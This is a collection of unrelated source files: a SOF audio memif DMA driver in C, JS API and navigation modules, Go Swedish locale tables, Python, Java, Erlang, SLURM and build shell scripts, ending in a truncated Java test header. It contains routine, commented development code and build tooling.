		uint32_t timing;
	} rate_map[] = {
		{8000, SGEN_CH_TIMING_8K},
		{12000, SGEN_CH_TIMING_12K},
		{16000, SGEN_CH_TIMING_16K},
		{24000, SGEN_CH_TIMING_24K},
		{32000, SGEN_CH_TIMING_32K},
		{48000, SGEN_CH_TIMING_48K},
		{96000, SGEN_CH_TIMING_96K},
		{192000, SGEN_CH_TIMING_192K},
		{384000, SGEN_CH_TIMING_384K},
		{7350, SGEN_CH_TIMING_7P35K},
		{11025, SGEN_CH_TIMING_11P025K},
		{14700, SGEN_CH_TIMING_14P7K},
		{22050, SGEN_CH_TIMING_22P05K},
		{29400, SGEN_CH_TIMING_29P4K},
		{44100, SGEN_CH_TIMING_44P1K},
		{88200, SGEN_CH_TIMING_88P2K},
		{176400, SGEN_CH_TIMING_176P4K},
		{352800, SGEN_CH_TIMING_352P8K},
	};
	uint32_t sinegen_timing = SGEN_CH_TIMING_48K;
	int matched = 0;
	size_t i;

	for (i = 0; i < ARRAY_SIZE(rate_map); i++) {
		if (rate_map[i].rate == rate) {
			sinegen_timing = rate_map[i].timing;
			matched = 1;
			break;
		}
	}

	if (!matched)
		tr_err(&memif_tr, "invalid rate %d, set default 48k ", rate);

	tr_dbg(&memif_tr, "rate %d, sinegen_timing %d ", rate, sinegen_timing);
	return sinegen_timing;
}
/* Read-modify-write the field (mask << shift) of an AFE register. */
static void mtk_afe_reg_update_bits(uint32_t addr_offset, uint32_t mask, uint32_t val, int shift)
{
	uint32_t reg = AFE_BASE_ADDR + addr_offset;
	uint32_t field_mask = mask << shift;
	uint32_t field_val = val << shift;

	io_reg_update_bits(reg, field_mask, field_val);
}
/* Read an AFE register at the given offset from the AFE register base. */
static uint32_t mtk_afe_reg_read(uint32_t addr_offset)
{
	return io_reg_read(AFE_BASE_ADDR + addr_offset);
}
/*
 * Enable or disable the hardware sine-tone generator and route its output
 * to the memif identified by @sgen_id at the given sample @rate.
 * The register writes follow the sequence: clock on -> route -> timing ->
 * freq/amp dividers -> enable; disable is the reverse (enable off, clock off).
 */
static void mt8195_afe_sinegen_enable(uint32_t sgen_id, uint32_t rate, int enable)
{
	uint32_t loopback_mode, reg_1, reg_2, sinegen_timing;

	tr_dbg(&memif_tr, "sgen_id %d, enable %d", sgen_id, enable);

	sinegen_timing = mt8195_sinegen_timing(rate);

	if (enable == 1) {
		/* set loopback mode */
		switch (sgen_id) {
		case MT8195_MEMIF_UL4:
			loopback_mode = MT8195_SGEN_UL4;
			break;
		case MT8195_MEMIF_UL5:
			loopback_mode = MT8195_SGEN_UL5;
			break;
		case MT8195_MEMIF_DL2:
			loopback_mode = MT8195_SGEN_DL2;
			break;
		case MT8195_MEMIF_DL3:
			loopback_mode = MT8195_SGEN_DL3;
			break;
		default:
			tr_err(&memif_tr, "invalid sgen_id %d", sgen_id);
			return;
		}
		/* enable sinegen clock*/
		mtk_afe_reg_update_bits(AUDIO_TOP_CON0, AUDIO_TML_PD_MASK, 0, AUDIO_TML_PD_SHIFT);
		/*loopback source*/
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON2, AFE_SINEGEN_LB_MODE_MSK, loopback_mode,
					AFE_SINEGEN_LB_MODE_SHIFT);
		/* sine gen timing*/
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON1, AFE_SINEGEN_CON1_TIMING_CH1_MASK,
					sinegen_timing, AFE_SINEGEN_CON1_TIMING_CH1_SHIFT);
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON1, AFE_SINEGEN_CON1_TIMING_CH2_MASK,
					sinegen_timing, AFE_SINEGEN_CON1_TIMING_CH2_SHIFT);
		/* freq div: note ch1/ch2 deliberately use different divisors,
		 * producing distinct tones on the two channels
		 */
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_FREQ_DIV_CH1_MASK,
					SGEN_FREQ_64D1, AFE_SGEN_FREQ_DIV_CH1_SHIFT);
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_FREQ_DIV_CH2_MASK,
					SGEN_FREQ_64D2, AFE_SGEN_FREQ_DIV_CH2_SHIFT);
		/*amp div*/
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_AMP_DIV_CH1_MASK, SGEN_AMP_D2,
					AFE_SGEN_AMP_DIV_CH1_SHIFT);
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_AMP_DIV_CH2_MASK, SGEN_AMP_D2,
					AFE_SGEN_AMP_DIV_CH2_SHIFT);
		/* enable sgen*/
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_ENABLE_MASK, 1,
					AFE_SGEN_ENABLE_SHIFT);
	} else {
		/* disable sgen*/
		mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_ENABLE_MASK, 0,
					AFE_SGEN_ENABLE_SHIFT);
		/* disable sgen clock */
		mtk_afe_reg_update_bits(AUDIO_TOP_CON0, AUDIO_TML_PD_MASK, 1, AUDIO_TML_PD_SHIFT);
	}

	/* Dump the control registers for debugging. */
	reg_1 = mtk_afe_reg_read(AFE_SINEGEN_CON0);
	reg_2 = mtk_afe_reg_read(AFE_SINEGEN_CON2);
	tr_dbg(&memif_tr, "AFE_SINEGEN_CON0 0x%x, AFE_SINEGEN_CON2 0x%x", reg_1, reg_2);
}
#endif
/* Start the memif transfer; only valid from PREPARE or SUSPEND state. */
static int memif_start(struct dma_chan_data *channel)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);

	tr_info(&memif_tr, "MEMIF:%d start(%d), channel_status:%d", memif->memif_id, channel->index,
		channel->status);

	switch (channel->status) {
	case COMP_STATE_PREPARE:
	case COMP_STATE_SUSPEND:
		break;
	default:
		return -EINVAL;
	}

	channel->status = COMP_STATE_ACTIVE;

#if TEST_SGEN
	mt8195_afe_sinegen_enable(TEST_SGEN_ID, 48000, 1);
#endif

	/* Do the HW start of the DMA */
	afe_memif_set_enable(memif->afe, memif->memif_id, 1);

	return 0;
}
/*
 * Resume a paused channel.
 * NOTE(review): this marks the channel ACTIVE but then *disables* the memif,
 * the opposite of memif_pause - looks inverted; confirm against the TODO below
 * before relying on pause/release semantics.
 */
static int memif_release(struct dma_chan_data *channel)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);

	/* TODO actually handle pause/release properly? */
	tr_info(&memif_tr, "MEMIF: release(%d)", channel->index);

	/* Only a paused channel may be released. */
	if (channel->status != COMP_STATE_PAUSED)
		return -EINVAL;

	channel->status = COMP_STATE_ACTIVE;

	afe_memif_set_enable(memif->afe, memif->memif_id, 0);

#if TEST_SGEN
	mt8195_afe_sinegen_enable(TEST_SGEN_ID, 48000, 0);
#endif

	return 0;
}
/* Pause an active channel: stop the hardware but keep the configuration. */
static int memif_pause(struct dma_chan_data *channel)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);

	/* TODO actually handle pause/release properly? */
	tr_info(&memif_tr, "MEMIF: pause(%d)", channel->index);

	/* Only an active channel may be paused. */
	if (channel->status != COMP_STATE_ACTIVE)
		return -EINVAL;

	channel->status = COMP_STATE_PAUSED;

	/* Disable HW requests */
	afe_memif_set_enable(memif->afe, memif->memif_id, 0);

	return 0;
}
/* Stop the channel and disable the memif; repeated stops are a no-op. */
static int memif_stop(struct dma_chan_data *channel)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);

	tr_info(&memif_tr, "MEMIF: stop(%d)", channel->index);

	/* Already stopped: do not try to stop multiple times. */
	if (channel->status == COMP_STATE_READY || channel->status == COMP_STATE_PREPARE)
		return 0;

	/* Only paused or active channels may transition to stopped. */
	if (channel->status != COMP_STATE_PAUSED && channel->status != COMP_STATE_ACTIVE)
		return -EINVAL;

	channel->status = COMP_STATE_READY;
	/* Disable channel */
	afe_memif_set_enable(memif->afe, memif->memif_id, 0);

	return 0;
}
/*
 * Advance the software-owned ring pointer by @bytes and notify subscribers.
 * For playback (direction != 0) software owns the write pointer; for capture
 * it owns the read pointer.
 */
static int memif_copy(struct dma_chan_data *channel, int bytes, uint32_t flags)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);
	struct dma_cb_data next = {
		.channel = channel,
		.elem.size = bytes,
	};
	uint32_t *sw_ptr = memif->direction ? &memif->wptr : &memif->rptr;

	/* TODO XRUN check, update hw ptr */
	/* TODO TBD Playback first data check */
	/* update user hwptr */
	*sw_ptr = (*sw_ptr + bytes) % memif->dma_size;

	tr_dbg(&memif_tr, "memif_copy: wptr:%u, rptr:%u", memif->wptr, memif->rptr);

	notifier_event(channel, NOTIFIER_ID_DMA_COPY, NOTIFIER_TARGET_CORE_LOCAL, &next,
		       sizeof(next));

	return 0;
}
/*
 * Report channel status and current read/write positions.
 * The hardware-owned pointer is refreshed from the memif position register
 * (read pointer for playback, write pointer for capture); positions are
 * reported as absolute addresses (offset + dma_base).
 */
static int memif_status(struct dma_chan_data *channel, struct dma_chan_status *status,
			uint8_t direction)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);
	unsigned int hw_ptr;

	status->state = channel->status;
	status->flags = 0;
	/* update current hw point */
	hw_ptr = afe_memif_get_cur_position(memif->afe, memif->memif_id);
	/* Convert the absolute hardware address to a buffer offset. */
	hw_ptr -= memif->dma_base;
	if (memif->direction)
		memif->rptr = hw_ptr;
	else
		memif->wptr = hw_ptr;
	status->r_pos = memif->rptr + memif->dma_base;
	status->w_pos = memif->wptr + memif->dma_base;
	status->timestamp = timer_get_system(timer_get());
	return 0;
}
/*
 * Set the DMA channel configuration: source/target address, buffer sizes,
 * DAI/IRQ binding. The requested direction must match the direction the AFE
 * driver reports for this memif. Only cyclic, non-scatter configurations
 * are supported. On success the channel moves to PREPARE state.
 */
static int memif_set_config(struct dma_chan_data *channel, struct dma_sg_config *config)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);
	int dai_id;
	int irq_id;
	unsigned int dma_addr;
	int dma_size = 0;
	int direction;
	int i;

	channel->is_scheduling_source = config->is_scheduling_source;
	channel->direction = config->direction;
	direction = afe_memif_get_direction(memif->afe, memif->memif_id);

	tr_info(&memif_tr, "memif_set_config, direction:%d, afe_dir:%d", config->direction,
		direction);
	/* The DAI id, IRQ id and buffer address are packed into the dev
	 * handshake fields; the buffer lives on the memory side of the elems.
	 * NOTE(review): the (int) casts narrow the 64-bit elem addresses -
	 * assumes buffers sit in 32-bit addressable memory; confirm.
	 */
	switch (config->direction) {
	case DMA_DIR_MEM_TO_DEV:
		if (direction != MEM_DIR_PLAYBACK)
			return -EINVAL;
		dai_id = (int)AFE_HS_GET_DAI(config->dest_dev);
		irq_id = (int)AFE_HS_GET_IRQ(config->dest_dev);
		dma_addr = (int)config->elem_array.elems[0].src;
		break;
	case DMA_DIR_DEV_TO_MEM:
		if (direction != MEM_DIR_CAPTURE)
			return -EINVAL;
		dai_id = (int)AFE_HS_GET_DAI(config->src_dev);
		irq_id = (int)AFE_HS_GET_IRQ(config->src_dev);
		dma_addr = (int)config->elem_array.elems[0].dest;
		tr_dbg(&memif_tr, "capture: dai_id:%d, dma_addr:%u\n", dai_id, dma_addr);
		break;
	default:
		tr_err(&memif_tr, "afe_memif_set_config() unsupported config direction");
		return -EINVAL;
	}

	/* Total ring size is the sum of all elem sizes. */
	for (i = 0; i < config->elem_array.count; i++)
		dma_size += (int)config->elem_array.elems[i].size;

	if (!config->cyclic) {
		tr_err(&memif_tr, "afe-memif: Only cyclic configurations are supported!");
		return -EINVAL;
	}
	if (config->scatter) {
		tr_err(&memif_tr, "afe-memif: scatter enabled, that is not supported for now!");
		return -EINVAL;
	}

	memif->dai_id = dai_id;
	memif->irq_id = irq_id;
	memif->dma_base = dma_addr;
	memif->dma_size = dma_size;
	memif->direction = direction;

	/* TODO risk, it may has sync problems with DAI comp */
	memif->rptr = 0;
	memif->wptr = 0;
	memif->period_size = config->elem_array.elems[0].size;

	/* get dai's config setting from afe driver */
	afe_dai_get_config(memif->afe, dai_id, &memif->channel, &memif->rate, &memif->format);

	/* set the afe memif parameters */
	afe_memif_set_params(memif->afe, memif->memif_id, memif->channel, memif->rate,
			     memif->format);
	afe_memif_set_addr(memif->afe, memif->memif_id, memif->dma_base, memif->dma_size);

	channel->status = COMP_STATE_PREPARE;

	return 0;
}
/*
 * Probe the memif DMA controller: probe the underlying AFE driver, then
 * allocate one dma_chan_data plus one afe_memif_dma per platform channel.
 * On any allocation failure, all partially allocated state is torn down
 * and the AFE driver is removed again.
 */
static int memif_probe(struct dma *dma)
{
	int channel;
	int ret;
	struct mtk_base_afe *afe = afe_get();
	struct afe_memif_dma *memif;

	/* A non-NULL chan array means we have already been probed. */
	if (!dma || dma->chan) {
		tr_err(&memif_tr, "MEMIF: Repeated probe");
		return -EEXIST;
	}

	/* do afe driver probe */
	ret = afe_probe(afe);
	if (ret < 0) {
		tr_err(&memif_tr, "MEMIF: afe_probe fail:%d", ret);
		return ret;
	}

	dma->chan = rzalloc(SOF_MEM_ZONE_RUNTIME, 0, SOF_MEM_CAPS_RAM,
			    dma->plat_data.channels * sizeof(struct dma_chan_data));
	if (!dma->chan) {
		tr_err(&memif_tr, "MEMIF: Probe failure, unable to allocate channel descriptors");
		return -ENOMEM;
	}

	for (channel = 0; channel < dma->plat_data.channels; channel++) {
		dma->chan[channel].dma = dma;
		/* TODO need divide to UL and DL for different index */
		dma->chan[channel].index = channel;
		memif = rzalloc(SOF_MEM_ZONE_SYS_RUNTIME, 0, SOF_MEM_CAPS_RAM,
				sizeof(struct afe_memif_dma));
		if (!memif) {
			tr_err(&memif_tr, "afe-memif: %d channel %d private data alloc failed",
			       dma->plat_data.id, channel);
			goto out;
		}
		memif->afe = afe;
		memif->memif_id = channel;
		dma_chan_set_data(&dma->chan[channel], memif);
	}

	return 0;
out:
	/* Free every channel's private data; channels past the failure point
	 * have NULL data (assumes rfree tolerates NULL - confirm).
	 */
	if (dma->chan) {
		for (channel = 0; channel < dma->plat_data.channels; channel++)
			rfree(dma_chan_get_data(&dma->chan[channel]));
		rfree(dma->chan);
		dma->chan = NULL;
	}
	afe_remove(afe);

	return -ENOMEM;
}
/* Tear down everything memif_probe() allocated and remove the AFE driver. */
static int memif_remove(struct dma *dma)
{
	int channel;
	struct mtk_base_afe *afe = afe_get();

	if (!dma->chan) {
		tr_err(&memif_tr, "MEMIF: remove called without probe, it's a no-op");
		return 0;
	}

	for (channel = 0; channel < dma->plat_data.channels; channel++) {
		/* TODO Disable HW requests for this channel */
		rfree(dma_chan_get_data(&dma->chan[channel]));
	}

	rfree(dma->chan);
	dma->chan = NULL;

	afe_remove(afe);

	return 0;
}
/*
 * Handle IRQ control requests for a memif channel.
 * STATUS_GET returns the raw IRQ status; CLEAR acks it; MASK disables the
 * IRQ; UNMASK programs the period length into the IRQ counter and enables it.
 * Requests on channels still in INIT state are ignored.
 */
static int memif_interrupt(struct dma_chan_data *channel, enum dma_irq_cmd cmd)
{
	struct mtk_base_afe *afe = afe_get();
	struct afe_memif_dma *memif = dma_chan_get_data(channel);
	/* Bytes per frame: 2 bytes/sample for S16, otherwise 4, times channels. */
	unsigned int sample_size =
		((memif->format == SOF_IPC_FRAME_S16_LE) ? 2 : 4) * memif->channel;
	unsigned int period = memif->period_size / sample_size;

	if (channel->status == COMP_STATE_INIT)
		return 0;

	switch (cmd) {
	case DMA_IRQ_STATUS_GET:
		return afe_irq_get_status(afe, memif->irq_id);
	case DMA_IRQ_CLEAR:
		afe_irq_clear(afe, memif->irq_id);
		return 0;
	case DMA_IRQ_MASK:
		afe_irq_disable(afe, memif->irq_id);
		/* Fix: previously fell through into DMA_IRQ_UNMASK and
		 * immediately re-configured and re-enabled the IRQ it had
		 * just disabled.
		 */
		return 0;
	case DMA_IRQ_UNMASK:
		afe_irq_config(afe, memif->irq_id, memif->rate, period);
		afe_irq_enable(afe, memif->irq_id);
		return 0;
	default:
		return -EINVAL;
	}
}
/*
 * Report DMA attributes for buffer allocation.
 * TODO need convert number to platform MACRO
 */
static int memif_get_attribute(struct dma *dma, uint32_t type, uint32_t *value)
{
	if (type == DMA_ATTR_BUFFER_ALIGNMENT || type == DMA_ATTR_COPY_ALIGNMENT)
		*value = 4;
	else if (type == DMA_ATTR_BUFFER_ADDRESS_ALIGNMENT)
		*value = 16;
	else if (type == DMA_ATTR_BUFFER_PERIOD_COUNT)
		*value = 4;
	else
		return -ENOENT;

	return 0;
}
/*
 * Compute available and free bytes in the ring buffer.
 * The hardware-owned pointer (read for playback, write for capture) is
 * refreshed from the memif position register; for playback the available
 * size is rounded up to a whole period, for capture rounded down.
 */
static int memif_get_data_size(struct dma_chan_data *channel, uint32_t *avail, uint32_t *free)
{
	struct afe_memif_dma *memif = dma_chan_get_data(channel);
	uint32_t hw_ptr;

	/* update hw pointer from afe memif */
	hw_ptr = afe_memif_get_cur_position(memif->afe, memif->memif_id);
	tr_dbg(&memif_tr, "get_pos:0x%x, base:0x%x, dir:%d", hw_ptr, memif->dma_base,
	       memif->direction);
	tr_dbg(&memif_tr, "dma_size:%u, period_size:%d", memif->dma_size, memif->period_size);
	/* Convert the absolute hardware address to a buffer offset. */
	hw_ptr -= memif->dma_base;
	if (memif->direction)
		memif->rptr = hw_ptr;
	else
		memif->wptr = hw_ptr;
	*avail = (memif->wptr + memif->dma_size - memif->rptr) % memif->dma_size;
	/* TODO, check if need alignment the available and free size to 1 period */
	if (memif->direction)
		*avail = DIV_ROUND_UP(*avail, memif->period_size) * memif->period_size;
	else
		*avail = *avail / memif->period_size * memif->period_size;
	*free = memif->dma_size - *avail;
	/* Fix: the format string has four conversions but only three arguments
	 * were passed, and the write pointer was printed under the "r:" label.
	 */
	tr_dbg(&memif_tr, "r:0x%x, w:0x%x, avail:%u, free:%u ", memif->rptr, memif->wptr,
	       *avail, *free);

	return 0;
}
/* DMA operations vtable exposing the AFE memif as a SOF DMA controller. */
const struct dma_ops memif_ops = {
	.channel_get = memif_channel_get,
	.channel_put = memif_channel_put,
	.start = memif_start,
	.stop = memif_stop,
	.pause = memif_pause,
	.release = memif_release,
	.copy = memif_copy,
	.status = memif_status,
	.set_config = memif_set_config,
	.probe = memif_probe,
	.remove = memif_remove,
	.interrupt = memif_interrupt,
	.get_attribute = memif_get_attribute,
	.get_data_size = memif_get_data_size,
};
|
import request from '@/utils/request'
/**
 * Create a new device-ability record.
 * @param {Object} data - payload sent as the request body
 * @returns {Promise} the axios-style request promise
 */
export function createDeviceAbility(data) {
  const config = {
    url: '/temp/api/deviceAbility/createDeviceAbility',
    method: 'post',
    data
  };
  return request(config);
}
/**
 * Delete the device ability with the given id.
 * @param {string|number} id - record identifier (interpolated into the URL)
 */
export function deleteAbility(id) {
  const url = `/temp/api/deviceAbility/deleteAbility/${id}`;
  return request({ url, method: 'delete' });
}
/**
 * Query device abilities matching the given filter.
 * @param {Object} data - filter/paging criteria sent as the request body
 */
export function fetchList(data) {
  const config = {
    url: '/temp/api/deviceAbility/select',
    method: 'post',
    data
  };
  return request(config);
}
/**
 * Update an existing device-ability record.
 * @param {Object} data - updated record sent as the request body
 */
export function updateDeviceAbility(data) {
  const config = {
    url: '/temp/api/deviceAbility/updateDeviceAbility',
    method: 'put',
    data
  };
  return request(config);
}
// Total record count for device-ability management
/**
 * Fetch the total device-ability count for the given selector.
 * @param {string|number} data - selector value interpolated into the URL path
 */
export function selectCount(data) {
  const url = `/temp/api/deviceAbility/select/${data}`;
  return request({ url, method: 'post' });
}
#!/bin/sh
# Launch a local development Erlang node from this project's directory.
cd `dirname $0`
# -sname edc          : short node name "edc"
# -config sys.config  : load the runtime configuration
# -pa ...             : add all built libs plus the test dir to the code path
# -boot start_sasl    : boot with the SASL logging application
# -run c erlangrc .   : evaluate the local .erlang resource file on startup
exec erl -sname edc -config $PWD/sys.config \
    -pa $PWD/_build/default/lib/*/ebin $PWD/test -boot start_sasl \
    -setcookie start-dev -run c erlangrc .
def solve_csp(constraints, individuals):
    """Assign individuals to roles based on per-role constraint predicates.

    Args:
        constraints: iterable of dicts with keys ``'role_id'`` and
            ``'condition'``, where ``'condition'`` is a predicate taking an
            individual dict and returning a truthy/falsy value.
        individuals: iterable of dicts, each with at least an ``'id'`` key.

    Returns:
        dict mapping each role_id (in first-occurrence order) to the list of
        ids of individuals satisfying every constraint for that role, in
        input order.
    """
    # Group conditions by role once, instead of rescanning the whole
    # constraint list for every (individual, role) pair (was O(I * R * C)).
    conditions_by_role = {}
    for constraint in constraints:
        conditions_by_role.setdefault(constraint['role_id'], []).append(
            constraint['condition'])

    return {
        role_id: [ind['id'] for ind in individuals
                  if all(cond(ind) for cond in conds)]
        for role_id, conds in conditions_by_role.items()
    }
<reponame>getevo/monday<filename>format_sv_se.go
package monday
// ============================================================
// Format rules for "sv_SE" locale: Swedish (Sweden)
// ============================================================
// longDayNamesSvSE maps English full weekday names to their Swedish forms.
// NOTE(review): names are capitalized here although Swedish normally writes
// weekday names in lowercase - confirm against the library's other locales.
var longDayNamesSvSE = map[string]string{
	"Sunday":    "Söndag",
	"Monday":    "Måndag",
	"Tuesday":   "Tisdag",
	"Wednesday": "Onsdag",
	"Thursday":  "Torsdag",
	"Friday":    "Fredag",
	"Saturday":  "Lördag",
}
// shortDayNamesSvSE maps English abbreviated weekday names to Swedish.
var shortDayNamesSvSE = map[string]string{
	"Sun": "Sön",
	"Mon": "Mån",
	"Tue": "Tis",
	"Wed": "Ons",
	"Thu": "Tors",
	"Fri": "Fre",
	"Sat": "Lör",
}
// longMonthNamesSvSE maps English full month names to their Swedish forms.
var longMonthNamesSvSE = map[string]string{
	"January":   "Januari",
	"February":  "Februari",
	"March":     "Mars",
	"April":     "April",
	"May":       "Maj",
	"June":      "Juni",
	"July":      "Juli",
	"August":    "Augusti",
	"September": "September",
	"October":   "Oktober",
	"November":  "November",
	"December":  "December",
}
// shortMonthNamesSvSE maps English abbreviated month names to Swedish.
// NOTE(review): these are lowercase while the day-name tables above are
// capitalized - confirm the intended casing is deliberate.
var shortMonthNamesSvSE = map[string]string{
	"Jan": "jan",
	"Feb": "feb",
	"Mar": "mar",
	"Apr": "apr",
	"May": "maj",
	"Jun": "jun",
	"Jul": "jul",
	"Aug": "aug",
	"Sep": "sep",
	"Oct": "okt",
	"Nov": "nov",
	"Dec": "dec",
}
|
# Stop any running "lightcomics" process, trying twice so a process that
# survives (or respawns after) the first pass is caught by the second.
#
# Fixes vs. the original:
#  - the echo claimed "kill -2" while the script actually sent SIGKILL (-9);
#    the message now matches the signal sent.
#  - the whole stop sequence was duplicated verbatim; it is now one function
#    called twice.
#  - "$CURRENT_PID" is quoted in the -z test so multiple matching PIDs
#    (a multi-word pgrep result) do not break the test.
stop_lightcomics() {
  echo "> Is Running?"
  CURRENT_PID=$(pgrep -f lightcomics)
  echo "$CURRENT_PID"

  if [ -z "$CURRENT_PID" ]; then
    echo "> Not Running!"
  else
    echo "> kill -9 $CURRENT_PID"
    # Intentionally unquoted: kill accepts each PID as a separate argument.
    kill -9 $CURRENT_PID
    sleep 1
    echo "TURN OFF COMPLETE"
  fi
}

stop_lightcomics
stop_lightcomics
|
<gh_stars>0
// Barrel file: re-export the LinkedIn helpers and the auth configuration API.
export * from "./lib/linkedin";
export * from "./lib/configure-auth"; // fix: missing trailing semicolon (consistency)
|
#!/bin/bash
# SLURM batch job: run one PE-my.py sequence-tagging configuration
# (maxtanh activation) on a single core with 6 GB RAM for up to 24 h.
#SBATCH -J Act_maxtanh_1
#SBATCH --mail-user=eger@ukp.informatik.tu-darmstadt.de
#SBATCH --mail-type=FAIL
#SBATCH -e /work/scratch/se55gyhe/log/output.err.%j
#SBATCH -o /work/scratch/se55gyhe/log/output.out.%j
#SBATCH -n 1 # Number of cores
#SBATCH --mem-per-cpu=6000
#SBATCH -t 23:59:00 # Hours, minutes and seconds, or '#SBATCH -t 10' -only mins
#module load intel python/3.5
# Positional args: activation, hidden size, optimizer, layers, dropout,
# learning rate, initializer, and a final hyper-parameter value.
python3 /home/se55gyhe/Act_func/sequence_tagging/arg_min/PE-my.py maxtanh 128 Nadam 2 0.23687732426215133 0.001348231159606572 varscaling 0.3
|
#!/bin/bash
# Generate the OpenAPI spec and CRD spec for the Argo CD application API.
set -x
set -o errexit
set -o nounset
set -o pipefail

PROJECT_ROOT=$(cd $(dirname "$0")/.. ; pwd)
PATH="${PROJECT_ROOT}/dist:${PATH}"
VERSION="v1alpha1"

# Create a "v2" symlink to the repo root so the v2 Go module import path
# (github.com/argoproj/argo-cd/v2/...) resolves on disk for openapi-gen.
[ -e ./v2 ] || ln -s . v2
./dist/openapi-gen \
    --go-header-file ${PROJECT_ROOT}/hack/custom-boilerplate.go.txt \
    --input-dirs github.com/argoproj/argo-cd/v2/pkg/apis/application/${VERSION} \
    --output-package github.com/argoproj/argo-cd/v2/pkg/apis/application/${VERSION} \
    --report-filename pkg/apis/api-rules/violation_exceptions.list \
    $@
# Remove the temporary module-path symlink again.
[ -e ./v2 ] && rm -rf v2

# Build and run the CRD spec generator outside module mode.
export GO111MODULE=off
go build -o ./dist/gen-crd-spec ${PROJECT_ROOT}/hack/gen-crd-spec
./dist/gen-crd-spec
|
<reponame>matto1990/Kirin<filename>platforms/android/kirin-for-android/kirin-lib/src/main/java/com/futureplatforms/kirin/helpers/KirinScreenHelper.java<gh_stars>0
package com.futureplatforms.kirin.helpers;
import android.app.Activity;
import android.content.Intent;
import com.futureplatforms.kirin.extensions.IKirinExtension;
import com.futureplatforms.kirin.internal.core.IJsContext;
import com.futureplatforms.kirin.internal.core.IKirinState;
import com.futureplatforms.kirin.internal.core.INativeContext;
/**
 * Kirin UI helper for a full-screen Activity: keeps the shared Kirin app
 * state's "current activity" pointer in sync with this screen's lifecycle
 * and relays activity results to the extension that launched them.
 */
public class KirinScreenHelper extends KirinUiFragmentHelper {

    public KirinScreenHelper(Activity nativeObject, String moduleName,
            IJsContext jsContext, INativeContext nativeContext,
            IKirinState appState) {
        super(nativeObject, moduleName, jsContext, nativeContext, appState);
    }

    /** Registers this screen's Activity as the app's current activity. */
    @Override
    public void onResume(Object... args) {
        getAppState().setActivity((Activity) getNativeObject());
        super.onResume(args);
    }

    /** Clears the current-activity pointer, but only if it still points at us. */
    @Override
    public void onPause() {
        if (getAppState().getActivity() == getNativeObject()) {
            getAppState().setActivity(null);
        }
        super.onPause();
    }

    /**
     * This is called by the activity (by default for KirinActivity),
     * and will extension that has launched another activity to get something (e.g. a login, taking a picture).
     * @param requestCode
     * @param resultCode
     * @param data
     */
    public void onActivityResult(int requestCode, int resultCode, Intent data) {
        IKirinExtension extension = getAppState().getActiveExtension();
        if (extension != null) {
            extension.onActivityResult(requestCode, resultCode, data);
            // TODO what happens if there is a chain of extensions?
            getAppState().setActiveExtension(null);
        }
    }
}
|
<filename>silk-react-components/src/HierarchicalMapping/Mixins/Navigation.js
// import _ from 'lodash';
import hierarchicalMappingChannel from '../store';
// Helper: push a payload onto a named channel of the mapping store.
const emit = (subjectName, payload) => {
    hierarchicalMappingChannel.subject(subjectName).onNext(payload);
};

const Navigation = {
    // jumps to selected rule as new center of view
    handleNavigate(id, parent, event) {
        emit('ruleId.change', {newRuleId: id, parentId: parent});
        event.stopPropagation();
    },
    // announces that a new mapping rule should be created
    handleCreate(infoCreation) {
        emit('mapping.create', infoCreation);
    },
    // opens the mapping suggestions view for the given event target
    handleShowSuggestions(event) {
        event.persist();
        emit('mapping.showSuggestions', event);
    },
    // expands or collapses the rule detail panels in the list
    handleToggleRuleDetails(stateExpand) {
        emit('list.toggleDetails', stateExpand);
    },
    // shows or hides the tree navigation sidebar
    promoteToggleTreenavigation(stateVisibility) {
        emit('treenav.toggleVisibility', stateVisibility);
    },
};

export default Navigation;
|
<gh_stars>1-10
/*
* Copyright (c) 2011, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name "TwelveMonkeys" nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.twelvemonkeys.imageio.plugins.icns;
import com.twelvemonkeys.imageio.util.ImageReaderAbstractTest;
import org.junit.Ignore;
import org.junit.Test;
import javax.imageio.ImageReader;
import javax.imageio.spi.ImageReaderSpi;
import java.awt.*;
import java.io.IOException;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
/**
* ICNSImageReaderTest
*
* @author <a href="mailto:<EMAIL>"><NAME></a>
* @author last modified by $Author: haraldk$
